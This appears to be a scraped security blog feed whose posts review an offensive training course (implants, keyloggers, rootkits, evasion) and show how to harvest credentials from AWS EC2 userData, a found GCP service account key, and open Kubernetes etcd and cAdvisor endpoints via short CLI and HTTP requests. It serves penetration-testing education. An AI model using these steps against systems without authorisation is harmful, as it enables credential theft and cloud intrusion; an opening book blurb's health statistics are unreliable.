"This book is an in-depth examination of the much needed process of 'self'-study known as self observation. We live in an age where the "attention function" in the brain has been badly damaged by TV and computers - up to 90 percent of the public under age 35 suffers from attention-deficit disorder! This book offers the most direct, non-pharmaceutical means of healing attention dysfunction. The methods presented here are capable of restoring attention to a fully functional and powerful tool for success in life and relationships. This is also an age when humanity has lost its connection with conscience. When humanity has poisoned the Earth's atmosphere, water, air and soil, when cancer is in epidemic proportions and is mainly an environmental illness, the author asks: What is the root cause? And he boldly answers: failure to develop conscience! Self-observation, he asserts, is the most ancient, scientific, and proven means to develop this crucial inner guide to awakening and a moral life. This book is for the lay-reader, both the beginner and the advanced student of self observation. No other book on the market examines this practice in such detail. There are hundreds of books on self-help and meditation, but almost none on self-study via self observation, and none with the depth of analysis, wealth of explication, and richness of experience which this book offers."

Finance

Rich Dad Poor Dad, I talked about this in 2013: http://carnal0wnage.attackresearch.com/2013/12/best-non-technical-book-i-read-this-year.html

↧

Dark Side Ops I & 2 Review

February 8, 2018, 2:31 pm

≫ Next: AWS EC2 instance userData

≪ Previous: Books I'd give to my 30yr old self

Dark Side Ops I
https://silentbreaksecurity.com/training/dark-side-ops/
https://www.blackhat.com/us-17/training/dark-side-ops-custom-penetration-testing.html

A really good overview of the class is here https://www.ethicalhacker.net/features/root/course-review-dark-side-ops-custom-penetration-testing

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development. The class material are getting slightly dated in some cases. A refresh might be helpful. More Throwback usage & development would be fun (even as optional labs).

DSO II
https://silentbreaksecurity.com/training/dark-side-ops-2-adversary-simulation/
https://www.blackhat.com/us-17/training/dark-side-ops-ii-adversary-simulation.html

Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.

Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 building a kernel rootkit

Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms:
I think the set of courses are having a bit of an identity crisis mostly due to the 2 day
format and would be a much better class as a 5 day. It is heavy development focused meaning you
spend a lot of time in Visual Studio tweaking C code. The “operations” piece of the course definitely
suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole
thing is entirely Windows focused so no Linux and no OSX. A suggestion to fix the “ops” piece
would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev one
is solely deving your implant and the Operator course would be solely using the implant you dev’d
(or was provided to you). The Silent Break team definitely knows their stuff and a longer class
format or switch up would allow them to showcase that more efficiently.

↧

AWS EC2 instance userData

November 29, 2018, 4:51 pm

≫ Next: I found a GCP service account token...now what?

≪ Previous: Dark Side Ops I & 2 Review

In the effort to get me blogging again I'll be doing a few short posts to get the juices flowing (hopefully).

Today I learned about the userData instance attribute for AWS EC2.

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html

In general I thought metadata was only things you can hit from WITHIN the instance via the metadata url: http://169.254.169.254/latest/meta-data/

However, if you read the link above there is an option to add metadata at boot time.

You can also use instance metadata to access user data that you specified when launching your instance. For example, you can specify parameters for configuring your instance, or attach a simple script.

That's interesting right?!?! so if you have some AWS creds the easiest way to check for this (after you enumerate instance IDs) is with the aws cli.

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX

An error occurred (InvalidInstanceID.NotFound) when calling the DescribeInstanceAttribute operation: The instance ID 'i-0XXXXXXXX' does not exist

ah crap, you need the region...

$ aws ec2 describe-instance-attribute --attribute userData --instance-id i-0XXXXXXXX --region us-west-1
{
"InstanceId": "i-0XXXXXXXX",
"UserData": {
"Value": "bm90IHRvZGF5IElTSVMgOi0p"}

anyway that can get tedious especially if the org has a ton of things running. This is precisely the reason @cktricky and I built weirdAAL. Surely no one would be sticking creds into things at boot time via shell scripts :-)

The module loops trough all the regions and any instances it finds and queries for the userData attribute. Hurray for automation.

That module is in the current version of weirdAAL. Enjoy.

-CG

↧

I found a GCP service account token...now what?

January 2, 2019, 11:05 am

≫ Next: Kubernetes: kube-hunter.py etcd

≪ Previous: AWS EC2 instance userData

Google Cloud Platform (GCP) is rapidly growing in popularity and i haven't seen too many posts on f**king it up so I'm going to do at least one :-)

Google has several ways to do authentication but most likely what you are going to come across shoved into code somewhere or in a dotfiles is a service account json file.

It's going to look similar to this:

These service account files are similar to AWS tokens in that it can be difficult to determine what they have access to if you don't already have console and/or IAM access. However with a little bit of scripting we can brute force at least some of the token's functionality pretty quickly. The issue being service accounts for something like GCP compute looks the same as one you made to manage your calendar or one of the 100's of other Google services.

You'll need to install the gcloud tools for you OS. Info here: https://cloud.google.com/sdk/

Once you have the gcloud suite of tools installed you can auth with the json file with the following command:

gcloud auth activate-service-account --key-file=KEY_FILE

If they key is invalid you'll see something like the below:

gcloud auth activate-service-account --key-file=21.json
ERROR: (gcloud.auth.activate-service-account) There was a problem refreshing your current auth tokens: invalid_grant: Not a valid email or user ID.

Otherwise it will look similar to below:

gcloud auth activate-service-account --key-file=/Users/CG/Documents/pentest/gcp-weirdaal/gcp.json
Activated service account credentials for: [python@removed.iam.gserviceaccount.com]

you can validate it worked by issuing gcloud auth list command:

gcloud auth list
Credentialed Accounts
ACTIVE ACCOUNT

* python@removed.iam.gserviceaccount.com

I put together a shell script that runs though a bunch of command to enumerate information. They only you info need to provide is the project name. This can be found in the json file in the project_id field or by issuing the gcloud project list command. Sometimes there are multiple projects associated with an account and you'd need to run the shell script with for each project.

The first time you run these api calls you might need to pass a "Y" to the cli to enable it. you can get around this manual shenanigans by doing a:

yes | ./gcp_enum.sh

This will answer Yes for you each time :-)

The script is here: https://gist.github.com/carnal0wnage/757d19520fcd9764b24ebd1d89481541

NCC Group also has two tools you could check out:

https://github.com/nccgroup/G-Scout

and

https://github.com/nccgroup/ScoutSuite

enjoy

CG

↧

Kubernetes: kube-hunter.py etcd

January 6, 2019, 6:00 am

≫ Next: Kubernetes: open etcd

≪ Previous: I found a GCP service account token...now what?

I mentioned in the master post one a few auditing tools that exist. Kube-Hunter is one that is pretty ok. You can use this to quickly scan for multiple kubernetes issues.

Example run:
$ ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 1.2.3.4
~ Started
~ Discovering Open Kubernetes Services...
|
| Etcd:
| type: open service
| service: Etcd
|_ host: 1.2.3.4:2379
|
| Etcd Remote version disclosure:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote version disclosure might give an
|_ attacker a valuable data to attack a cluster
|
| Etcd is accessible using insecure connection (HTTP):
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Etcd is accessible using HTTP (without
| authorization and authentication), it would allow a
| potential attacker to
| gain access to
|_ the etcd
|
| Etcd Remote Read Access Event:
| type: vulnerability
| host: 1.2.3.4:2379
| description:
| Remote read access might expose to an
|_ attacker cluster's possible exploits, secrets and more.

----------

Nodes
+-------------+----------------+
| TYPE | LOCATION |
+-------------+----------------+
| Node/Master | 1.2.3.4 |
+-------------+----------------+

Detected Services
+---------+---------------------+----------------------+
| SERVICE | LOCATION | DESCRIPTION |
+---------+---------------------+----------------------+
| Etcd | 1.2.3.4:2379 | Etcd is a DB that |
| | | stores cluster's |
| | | data, it contains |
| | | configuration and |
| | | current state |
| | | information, and |
| | | might contain |
| | | secrets |
+---------+---------------------+----------------------+

Vulnerabilities
+--------------+------------------+----------------------+---------------------+--------------------------+
| LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE |
+--------------+------------------+----------------------+---------------------+--------------------------+
| 1.2.3.4:2379 | Unauthenticated | Etcd is accessible | Etcd is accessible | {"etcdserver":"3.3.9 |
| | Access | using insecure | using HTTP (without | ","etcdcluster":"3.3 |
| | | connection (HTTP) | authorization and | ... |
| | | | authentication), it | |
| | | | would allow a | |
| | | | potential attacker | |
| | | | to | |
| | | | gain access to | |
| | | | the etcd | |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Information | Etcd Remote version | Remote version | {"etcdserver":"3.3.9 |
| | Disclosure | disclosure | disclosure might | ","etcdcluster":"3.3 |
| | | | give an attacker a | ... |
| | | | valuable data to | |
| | | | attack a cluster | |
+---------------------+----------------------+----------------------+----------------------+--------------+
| 1.2.3.4:2379 | Access Risk | Etcd Remote Read | Remote read access | {"action":"get","nod |
| | | Access Event | might expose to an | e":{"dir":true,"node |
| | | | attacker cluster's | ... |
| | | | possible exploits, | |
| | | | secrets and more. | |
+--------------+------------------+----------------------+---------------------+--------------------------+

↧

Kubernetes: open etcd

January 6, 2019, 6:00 am

≫ Next: Kubernetes: cAdvisor

≪ Previous: Kubernetes: kube-hunter.py etcd

Quick post on Kubernetes and open etcd (port 2379)

"etcd is a distributed key-value store. In fact, etcd is the primary datastore of Kubernetes; storing and replicating all Kubernetes cluster state. As a critical component of a Kubernetes cluster having a reliable automated approach to its configuration and management is imperative."

-from: https://coreos.com/blog/introducing-the-etcd-operator.html

What this means in english is that etcd stores the current state of the Kubernetes cluster usually including the kubernetes tokens and passwords. If you check out the following references you can get a sense for the pain level that could potentially be involved. At minimum you can get network info or running pods and at best credentials.

refs:
https://techbeacon.com/hackers-guide-kubernetes-security
https://elweb.co/the-security-footgun-in-etcd/
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/

the second link talks extensively around types of info the found when they hit all the shodan endpoints for 2379 and did some analysis on the results.

If you manage to find open etcd the easiest way to check for creds is to just do a curl request for:

GET http://ip_address:2379/v2/keys/?recursive=true

Example Loot -

Usually it's boring stuff like this:

But occasionally you'll get more interesting things like:

or more fun things like kublet tokens:

↧

Kubernetes: cAdvisor

January 6, 2019, 6:00 am

≫ Next: Kubernetes: Master Post

≪ Previous: Kubernetes: open etcd

"cAdvisor (Container Advisor) provides container users an understanding of the resource usage and performance characteristics of their running containers. It is a running daemon that collects, aggregates, processes, and exports information about running containers."

runs on port 4194

Links:
https://kubernetes.io/docs/tasks/debug-application-cluster/resource-usage-monitoring/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/

What do you get?

information disclosure about metrics of the containers.

Example request to hit the API and dump data:

http://1.2.3.4:4194/api/v2.0/spec?recursive=true

Screenshots

↧

Latest Images